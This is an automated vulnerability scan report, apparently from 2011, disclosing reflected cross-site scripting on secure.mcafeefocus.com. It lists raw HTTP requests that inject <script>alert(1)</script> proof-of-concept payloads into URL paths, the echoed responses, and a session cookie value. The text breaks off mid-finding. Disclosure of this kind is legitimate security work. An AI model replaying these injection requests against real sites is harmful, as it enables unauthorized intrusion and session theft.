XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, secure.mcafeefocus.com

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Wed Aug 24 10:10:00 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in secure.macafeefocus.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. https://secure.mcafeefocus.com/attendee_login.php [REST URL parameter 1]

1.2. https://secure.mcafeefocus.com/css/mf11_default.css [REST URL parameter 1]

1.3. https://secure.mcafeefocus.com/css/mf11_default.css [REST URL parameter 2]

1.4. https://secure.mcafeefocus.com/css/mf11_g2.css [REST URL parameter 1]

1.5. https://secure.mcafeefocus.com/css/mf11_g2.css [REST URL parameter 2]

1.6. https://secure.mcafeefocus.com/css/mf11_reset.css [REST URL parameter 1]

1.7. https://secure.mcafeefocus.com/css/mf11_reset.css [REST URL parameter 2]

1.8. https://secure.mcafeefocus.com/eventlib/js/utils.js [REST URL parameter 1]

1.9. https://secure.mcafeefocus.com/eventlib/js/utils.js [REST URL parameter 2]

1.10. https://secure.mcafeefocus.com/eventlib/js/utils.js [REST URL parameter 3]

1.11. https://secure.mcafeefocus.com/favicon.ico [REST URL parameter 1]

1.12. https://secure.mcafeefocus.com/jquery/js/jquery-1.5.1.min.js [REST URL parameter 1]

1.13. https://secure.mcafeefocus.com/jquery/js/jquery-1.5.1.min.js [REST URL parameter 2]

1.14. https://secure.mcafeefocus.com/jquery/js/jquery-1.5.1.min.js [REST URL parameter 3]

1.15. https://secure.mcafeefocus.com/jquery/js/jquery-ui-1.8.6.custom.min.js [REST URL parameter 1]

1.16. https://secure.mcafeefocus.com/jquery/js/jquery-ui-1.8.6.custom.min.js [REST URL parameter 2]

1.17. https://secure.mcafeefocus.com/jquery/js/jquery-ui-1.8.6.custom.min.js [REST URL parameter 3]

1.18. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js [REST URL parameter 1]

1.19. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js [REST URL parameter 2]

1.20. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js [name of an arbitrarily supplied request parameter]

1.21. https://secure.mcafeefocus.com/register [REST URL parameter 1]

2. Password field with autocomplete enabled

3. Email addresses disclosed

3.1. https://secure.mcafeefocus.com/attendee_login.php

3.2. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js

3.3. https://secure.mcafeefocus.com/register

4. Cacheable HTTPS response

4.1. https://secure.mcafeefocus.com/attendee_login.php

4.2. https://secure.mcafeefocus.com/js/AC_RunActiveContent.js

5. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 21 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. https://secure.mcafeefocus.com/attendee_login.php [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /attendee_login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b67f<script>alert(1)</script>af2177ace05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attendee_login.php6b67f<script>alert(1)</script>af2177ace05 HTTP/1.1
Host: secure.mcafeefocus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:51:06 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4630
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /attendee_login.php6b67f<script>alert(1)</script>af2177ace05 was not found on this server.
<p>
...[SNIP]...

1.2. https://secure.mcafeefocus.com/css/mf11_default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /css/mf11_default.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 35fcc<script>alert(1)</script>4f603e2088c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css35fcc<script>alert(1)</script>4f603e2088c/mf11_default.css HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4632
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /css35fcc<script>alert(1)</script>4f603e2088c/mf11_default.css was not found on this server.
<p>
...[SNIP]...

1.3. https://secure.mcafeefocus.com/css/mf11_default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /css/mf11_default.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8167<script>alert(1)</script>49665db3555 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mf11_default.cssc8167<script>alert(1)</script>49665db3555 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:18 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4632
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /css/mf11_default.cssc8167<script>alert(1)</script>49665db3555 was not found on this server.
<p>
...[SNIP]...

1.4. https://secure.mcafeefocus.com/css/mf11_g2.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /css/mf11_g2.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c142<script>alert(1)</script>bff5f443c29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css9c142<script>alert(1)</script>bff5f443c29/mf11_g2.css HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4627
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /css9c142<script>alert(1)</script>bff5f443c29/mf11_g2.css was not found on this server.
<p>
...[SNIP]...

1.5. https://secure.mcafeefocus.com/css/mf11_g2.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /css/mf11_g2.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d5c70<script>alert(1)</script>ee08ac0f0aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mf11_g2.cssd5c70<script>alert(1)</script>ee08ac0f0aa HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:18 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4627
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /css/mf11_g2.cssd5c70<script>alert(1)</script>ee08ac0f0aa was not found on this server.
<p>
...[SNIP]...

1.6. https://secure.mcafeefocus.com/css/mf11_reset.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /css/mf11_reset.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d4b<script>alert(1)</script>a5404764a49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css56d4b<script>alert(1)</script>a5404764a49/mf11_reset.css HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:15 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4630
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /css56d4b<script>alert(1)</script>a5404764a49/mf11_reset.css was not found on this server.
<p>
...[SNIP]...

1.7. https://secure.mcafeefocus.com/css/mf11_reset.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /css/mf11_reset.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9c444<script>alert(1)</script>0822f25e294 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /css/mf11_reset.css9c444<script>alert(1)</script>0822f25e294 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:16 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4630
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /css/mf11_reset.css9c444<script>alert(1)</script>0822f25e294 was not found on this server.
<p>
...[SNIP]...

1.8. https://secure.mcafeefocus.com/eventlib/js/utils.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /eventlib/js/utils.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 719dc<script>alert(1)</script>0f51f3f1132 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eventlib719dc<script>alert(1)</script>0f51f3f1132/js/utils.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:19 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4632
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /eventlib719dc<script>alert(1)</script>0f51f3f1132/js/utils.js was not found on this server.
<p>
...[SNIP]...

1.9. https://secure.mcafeefocus.com/eventlib/js/utils.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /eventlib/js/utils.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27bf7<script>alert(1)</script>d6c6e9d75a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eventlib/js27bf7<script>alert(1)</script>d6c6e9d75a1/utils.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:20 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4632
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /eventlib/js27bf7<script>alert(1)</script>d6c6e9d75a1/utils.js was not found on this server.
<p>
...[SNIP]...

1.10. https://secure.mcafeefocus.com/eventlib/js/utils.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /eventlib/js/utils.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7147e<script>alert(1)</script>6ec20616c77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eventlib/js/utils.js7147e<script>alert(1)</script>6ec20616c77 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:21 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4632
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /eventlib/js/utils.js7147e<script>alert(1)</script>6ec20616c77 was not found on this server.
<p>
...[SNIP]...

1.11. https://secure.mcafeefocus.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 398ec<script>alert(1)</script>b99e2f4317 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico398ec<script>alert(1)</script>b99e2f4317 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:35:38 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4622
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /favicon.ico398ec<script>alert(1)</script>b99e2f4317 was not found on this server.
<p>
...[SNIP]...

1.12. https://secure.mcafeefocus.com/jquery/js/jquery-1.5.1.min.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /jquery/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload be6a8<script>alert(1)</script>fa639426050 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquerybe6a8<script>alert(1)</script>fa639426050/js/jquery-1.5.1.min.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:21 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4641
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jquerybe6a8<script>alert(1)</script>fa639426050/js/jquery-1.5.1.min.js was not found on this server.
<p>
...[SNIP]...

1.13. https://secure.mcafeefocus.com/jquery/js/jquery-1.5.1.min.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /jquery/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef9f2<script>alert(1)</script>9c99eef86d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery/jsef9f2<script>alert(1)</script>9c99eef86d4/jquery-1.5.1.min.js HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:22 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4641
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p>The requested URL /jquery/jsef9f2<script>alert(1)</script>9c99eef86d4/jquery-1.5.1.min.js was not found on this server.
<p>
...[SNIP]...

1.14. https://secure.mcafeefocus.com/jquery/js/jquery-1.5.1.min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.mcafeefocus.com
Path:   /jquery/js/jquery-1.5.1.min.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dec5e<script>alert(1)</script>b15d70b57c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jquery/js/jquery-1.5.1.min.jsdec5e<script>alert(1)</script>b15d70b57c9 HTTP/1.1
Host: secure.mcafeefocus.com
Connection: keep-alive
Referer: https://secure.mcafeefocus.com/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MCAFEEFOCUS2011SESSID=89ork9p3o2j7anejlnvanjct41

Response

HTTP/1.1 200 OK
Date: Wed, 24 Aug 2011 15:49:24 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0d DAV/2 PHP/5.3.5 with Suhosin-Patch
X-Powered-By: PHP/5.3.5
Content-Length: 4641
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
